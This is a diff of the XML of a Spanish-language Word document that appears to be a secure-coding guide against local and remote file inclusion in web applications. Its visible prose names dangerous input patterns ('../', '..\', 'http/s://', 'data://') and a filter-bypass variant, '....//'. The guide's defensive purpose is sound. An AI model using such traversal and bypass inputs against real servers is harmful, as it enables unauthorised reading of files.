-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Evitar la Inclusión Directa de Archivos </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">por </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ntrada del </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>suario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> y usar un mapeo seguro de nombres de archivos. Por ejemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37121785" wp14:editId="0D63C0E9">
-            <wp:extent cx="5074090" cy="1455089"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="2112227438" name="Imagen 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="2112227438" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5177564" cy="1484762"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="708"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Esto es un array q</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ue asocia o mapea un </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>identificador a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> cada recurso </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>o archivo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> real del sistema</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>. El usuario solo tendrá acceso al identificador, proporcionándole una capa de protección adicional</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ejemplo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">completo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>de Código Seguro</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06805861" wp14:editId="4A4DAFAD">
-            <wp:extent cx="5088255" cy="2099144"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="923590827" name="Imagen 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="923590827" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5253570" cy="2167344"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
@@ -3878,7 +3921,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BFE415" wp14:editId="5E3454A0">
             <wp:extent cx="5400040" cy="1382233"/>
@@ -3895,7 +3937,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4090,7 +4132,31 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>patrones peligrosos, por un lado elimina el posible reemplazo de “http/s://” previniendo ataques RFI; y por otro los caracteres “../”, “..\” evitando la navegación de directorios</w:t>
+        <w:t xml:space="preserve">patrones peligrosos, por un lado elimina el posible reemplazo de “http/s://” previniendo ataques RFI; y por otro los caracteres </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/”, “..\” evitando la navegación de directorios</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4163,6 +4229,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">2.3.2.- </w:t>
       </w:r>
       <w:r>
@@ -4310,16 +4377,29 @@
         </w:rPr>
         <w:t xml:space="preserve">Un atacante podría usar variaciones como </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"....//"</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"....</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>//"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4657,7 +4737,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Implementar un rango más amplio de patrones potencialmente malintencionados, como caracteres codificados, esquemas inusuales</w:t>
       </w:r>
       <w:r>
@@ -4746,7 +4825,19 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>data://</w:t>
+        <w:t>data:/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4768,7 +4859,19 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> o extensiones de archivo sospechosas</w:t>
+        <w:t xml:space="preserve"> o</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> extensiones de archivo sospechosas</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4921,6 +5024,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>U</w:t>
       </w:r>
       <w:r>
@@ -5008,7 +5112,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5165,7 +5269,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A73D1A" wp14:editId="28556F49">
             <wp:extent cx="5229447" cy="2413591"/>
@@ -5182,7 +5285,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5378,6 +5481,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>3.2.</w:t>
       </w:r>
       <w:r>
@@ -5455,7 +5559,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5528,7 +5632,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">3.2.1.- </w:t>
       </w:r>
       <w:r>
@@ -5993,6 +6096,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EB20B2" wp14:editId="4397232C">
             <wp:extent cx="5185802" cy="3125972"/>
@@ -6009,7 +6113,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6108,7 +6212,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">3.2.3.- </w:t>
       </w:r>
       <w:r>
@@ -6177,7 +6280,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6289,6 +6392,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB35044" wp14:editId="70D0FFF6">
             <wp:extent cx="5400040" cy="1381760"/>
@@ -6305,7 +6409,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6417,7 +6521,7 @@
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipervnculo"/>
@@ -6514,7 +6618,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Deshabilitar la opción </w:t>
       </w:r>
       <w:r>
@@ -6669,7 +6772,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6954,7 +7057,6 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">4. </w:t>
       </w:r>
       <w:r>
@@ -7372,6 +7474,7 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Configurar el servidor web (por ejemplo, Apache) para limitar el acceso a directorios sensibles.</w:t>
       </w:r>
     </w:p>
@@ -7595,8 +7698,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId22"/>
-      <w:footerReference w:type="default" r:id="rId23"/>
+      <w:headerReference w:type="default" r:id="rId25"/>
+      <w:footerReference w:type="default" r:id="rId26"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -7702,6 +7805,104 @@
       </w:r>
     </w:p>
   </w:footnote>
+  <w:footnote w:id="1">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Textonotapie"/>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId1" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+            <w:sz w:val="16"/>
+            <w:szCs w:val="16"/>
+          </w:rPr>
+          <w:t>https://developer.mozilla.org/es/docs/Web/HTTP/Headers/X-XSS-Protection</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="2">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Textonotapie"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId2" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+            <w:sz w:val="16"/>
+            <w:szCs w:val="16"/>
+          </w:rPr>
+          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="3">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Textonotapie"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Refdenotaalpie"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId3" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>https://www.chromium.org/developers/design-documents/xss-auditor/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Textonotapie"/>
+      </w:pPr>
+    </w:p>
+  </w:footnote>
 </w:footnotes>
 </file>
 
@@ -7767,7 +7968,7 @@
         <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
         <o:lock v:ext="edit" aspectratio="t"/>
       </v:shapetype>
-      <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:11.25pt;height:11.25pt" o:bullet="t">
+      <v:shape id="_x0000_i1132" type="#_x0000_t75" style="width:11.25pt;height:11.25pt" o:bullet="t">
         <v:imagedata r:id="rId1" o:title="msoAA7A"/>
       </v:shape>
     </w:pict>
@@ -10411,6 +10612,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="42ED477A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9E467FE2"/>
+    <w:lvl w:ilvl="0" w:tplc="0C0A000D">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C0A0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
